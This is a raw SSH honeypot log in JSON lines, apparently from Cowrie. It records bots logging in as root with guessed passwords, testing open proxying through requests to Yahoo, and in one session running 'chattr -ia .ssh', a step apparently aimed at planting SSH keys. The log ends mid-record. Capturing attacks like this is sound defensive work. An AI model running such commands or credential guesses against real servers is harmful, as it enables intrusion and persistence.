{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.223537Z","src_ip":"213.209.150.239","session":"ec7c5c2ad194"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":9986,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9986","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.361631Z","session":"ec7c5c2ad194"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.408886Z","src_ip":"213.209.150.239","session":"ec7c5c2ad194"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.457108Z","src_ip":"213.209.150.239","session":"ec7c5c2ad194"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4048,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5518c5f285a","protocol":"ssh","message":"New connection: 213.209.150.239:4048 (1.2.3.4:22) [session: b5518c5f285a]","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.503117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.504108Z","src_ip":"213.209.150.239","session":"b5518c5f285a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.551347Z","src_ip":"213.209.150.239","session":"b5518c5f285a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.786316Z","src_ip":"213.209.150.239","session":"b5518c5f285a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":7109,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7109","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.835206Z","session":"b5518c5f285a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:21.882469Z","src_ip":"213.209.150.239","session":"b5518c5f285a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9374,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9374","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.017725Z","session":"b5518c5f285a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.065310Z","src_ip":"213.209.150.239","session":"b5518c5f285a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.113474Z","src_ip":"213.209.150.239","session":"b5518c5f285a"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":54124,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cb2b9aae99e","protocol":"ssh","message":"New connection: 27.112.78.170:54124 (1.2.3.4:22) [session: 8cb2b9aae99e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.119895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.120887Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4096,"dst_ip":"1.2.3.4","dst_port":22,"session":"b50ba921f1ba","protocol":"ssh","message":"New connection: 213.209.150.239:4096 (1.2.3.4:22) [session: b50ba921f1ba]","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.159622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.160351Z","src_ip":"213.209.150.239","session":"b50ba921f1ba"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.207667Z","src_ip":"213.209.150.239","session":"b50ba921f1ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.380245Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.442691Z","src_ip":"213.209.150.239","session":"b50ba921f1ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25267,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25267","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.490943Z","session":"b50ba921f1ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.538376Z","src_ip":"213.209.150.239","session":"b50ba921f1ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2018,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2018","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.674026Z","session":"b50ba921f1ba"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.722152Z","src_ip":"213.209.150.239","session":"b50ba921f1ba"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.770351Z","src_ip":"213.209.150.239","session":"b50ba921f1ba"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4145,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3f7a5503d7c","protocol":"ssh","message":"New connection: 213.209.150.239:4145 (1.2.3.4:22) [session: e3f7a5503d7c]","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.816217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.816911Z","src_ip":"213.209.150.239","session":"e3f7a5503d7c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:22.863979Z","src_ip":"213.209.150.239","session":"e3f7a5503d7c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.098211Z","src_ip":"213.209.150.239","session":"e3f7a5503d7c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14654,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14654","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.146000Z","session":"e3f7a5503d7c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.193011Z","src_ip":"213.209.150.239","session":"e3f7a5503d7c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27195,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27195","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.329286Z","session":"e3f7a5503d7c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.376202Z","src_ip":"213.209.150.239","session":"e3f7a5503d7c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.424281Z","src_ip":"213.209.150.239","session":"e3f7a5503d7c"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer.123","message":"login attempt [root/qwer.123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.453525Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4198,"dst_ip":"1.2.3.4","dst_port":22,"session":"192f7b7b0e80","protocol":"ssh","message":"New connection: 213.209.150.239:4198 (1.2.3.4:22) [session: 192f7b7b0e80]","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.479975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.480806Z","src_ip":"213.209.150.239","session":"192f7b7b0e80"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.537580Z","src_ip":"213.209.150.239","session":"192f7b7b0e80"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.819628Z","src_ip":"213.209.150.239","session":"192f7b7b0e80"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":7775,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7775","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.877339Z","session":"192f7b7b0e80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:23.934538Z","src_ip":"213.209.150.239","session":"192f7b7b0e80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:59:24.041329Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.042336Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.044283Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11648,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11648","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.091485Z","session":"192f7b7b0e80"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.148593Z","src_ip":"213.209.150.239","session":"192f7b7b0e80"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.206067Z","src_ip":"213.209.150.239","session":"192f7b7b0e80"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4241,"dst_ip":"1.2.3.4","dst_port":22,"session":"23c4364a3ecf","protocol":"ssh","message":"New connection: 213.209.150.239:4241 (1.2.3.4:22) [session: 23c4364a3ecf]","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.252165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:24.253035Z","src_ip":"213.209.150.239","session":"23c4364a3ecf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 